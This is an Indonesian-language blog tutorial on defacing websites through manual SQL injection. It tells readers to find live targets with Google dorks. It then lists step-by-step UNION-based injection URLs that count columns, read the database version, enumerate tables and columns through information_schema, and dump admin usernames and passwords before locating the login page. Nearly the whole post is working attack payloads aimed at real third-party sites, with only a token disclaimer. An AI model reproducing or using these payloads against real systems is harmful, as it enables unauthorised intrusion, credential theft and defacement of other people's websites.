Beranda Defacing Tutorial Deface Dengan Teknik SQL injection Manual
Deface Dengan Teknik SQL injection Manual
tapi kali ini ane bahas hack website aja dulu. Besok kalau ada waktu ane bahas hack facebook, server dll. Sebelumnya ane ingetin ke ente ini cuma sebatas pembelajaran dan berbagi pengetahuan. Jangan disalah gunakan. Ane gak bertangggung jawab kalo terjadi hal yang diluar dugaan ane. Nah berikut tips trik hacking. Kali ini ane mau share hacking deface website atau masuk ke halaman administrator sebuah website tanpa mengetahui passwordnya. Yaitu dengan metode SQL Injection. Meskipun metode ini di haruskan untuk hacker tingkat lanjut bukan pemula karena untuk melakukan teknik ini kita harus mempunyai dasar. Ane asumsikan ente udah ngerti hal kaya 👇
1. paham database MySQL dan SQL kode
2. sedikit bnyak paham bahasa pemrograman PHP
3. paham soal tcp/ip,server dan DNS.
4. mempunyai logika yang lumayan cepat.
Agar ente termotifasi dan semangat, ente harus membaca berita-berita tentang hacker-hacker indonesia yang terkenal. Salah satunya wildan. Karena wildan menggunakan teknik SQL Injection ini dalam melakukan penetrasi terhadap website Presiden SBY . meskipun akhirnya melakukan pengalihan DNS, tapi buat masuk kesuatu teknik lain terlebih dahulu wildan pake teknik SQL Injection.
Ok kalo ente udah punya dasar di atas, kita langsung ke intinya. SQL Injection adalah teknik menyusup/masuk ke suatu website dengan cara yang tidak wajar dengan memanfaatkan bug error pada sebuah website dengan melakukan suntikan kode SQL. Pada teknik ini logika diutamakan. disini kita tidak akan menggunakan tool atau program pembantu lainnya. Kita hanya bermodal address bar pada browser. Disini kita bermain dengan kode. Karena pantang bagi seorang hacker kalau masih melakukan penetrasi dengan bantuan tool atau program tertentu. Hacker yang perfect itu bermain dengan logika dan kode script.
Ok pertama kita cari target yaitu menggunakan dork, banyak dork-dork yang tersedia pada forum-forum hacker ente bisa menggunakannya. Tapi kita contoh saja dork pilih salah satu yaitu 👇
Inurl:index.php?id=
Inurl.:php?id= intext:warning: mysql_fetch_array()berita.php?id=100
[site]/berita.php?id=100
Ketikkan dork tersebut di kolom pencarian mbah google dan enter Pilih salah satu website yang akan jadi target sebagai contoh penetrasi kita (jangan merusak).
Tambahin karakter ' pada akhir url atau menambahkan karakter "-" buat liat apakah ada pesan error. contoh:
[site]/berita.php?id=100'
atau
[site]/berita.php?id=-100
Sampe muncul pesan error seperti berikut (masih bnyak lagi) :
=========== step Dua : ===========
mencari dan menghitung jumlah table yang ada dalam databasenya... pake perintah : order by
contoh 👇
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satu persatu) ...
misal 👇
[site]/berita.php?id=-100+order+by+1--[site]/berita.php?id=-100+order+by+2--[site]/berita.php?id=-100+order+by+3--[site]/berita.php?id=-100+order+by+4--
sampe muncul error atau hilang pesan error... misal👇
[site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8 menjadi
[site]/berita.php?id=-100+order+by+8--
============ step Tiga : ============
Buat mengeluarkan angka berapa yang muncul pake perintah union karena tadi error sampai angka 9 maka III
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5 pake perintah version() atau @@version buat cek versi sql yg dia pake masukin perintah tsb pada nagka yg keluar tadi misal:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8--
atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg dipake, seumpama versi 4 tinggalin ajah, karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena gak bisa pake perintah From+Information_schema ..
Buat versi 5 berarti ente beruntung gak perlu nebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
=============step Empat : =============
Buat menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukin do angka yg keluar tadi perintah+from+information_schema.tables/* >>> dimasukin abis angka terakhir Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah"admin"
============step Lima : ============
Buat menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukin di angka yg keluar tadi perintah+from+information_schema.tables+where+table_schema=database() >>> dimasukin abis angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()--
============== step Enam: ==============
perintah group_concat(column_name) >>> dimasukin di angka yg keluar tadi perintah+from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukin abis angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--
Di tahap ini ente wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya website yg dipake buat konversi👇
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--
============= step Tujuh : =============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara perintah concat_ws (0x3a, hasil isi column yg mau dikeluarin) >>> dimasukin di angka yg keluar tadiperintah +from+ (nama table berasal) >>> dimasukin abis angka terakhir Contoh 👇
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a, hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
=============== step Delapan : ===============
tahap terakhir mencari halam admin atau login .
Terimakasih ^_^ :D
No comments
Post a Comment